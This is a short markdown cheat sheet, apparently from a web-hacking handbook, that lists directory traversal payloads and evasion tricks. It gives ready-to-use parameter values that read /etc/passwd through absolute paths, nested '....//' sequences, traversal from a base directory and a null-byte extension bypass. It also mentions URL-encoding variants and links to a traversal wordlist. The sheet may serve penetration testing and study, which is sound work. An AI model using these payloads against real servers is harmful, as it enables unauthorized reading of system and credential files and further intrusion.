handbook/tools/3.Web-Hacking/4.Injection/Directory-Traversal/Commands.md

Directory Traversal Injection Technique & Evasion

• Common

• Bypass

#Use an absolute path
filename=/etc/passwd

#Use nested traversal
....// or
....\/

#Utilize URL Encoding
- 16-bit
- Double URL
- UTF-8

#Burp Suite Professional
	§ Contains encoded path traversal sequences

#Start with the base file and traverse from there
filename=/var/www/images/../../../etc/passwd

#Bypass the requirement to end with a file extension by using a null byte
filename=../../../etc/passwd%00.png

• Wordlists ---> https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt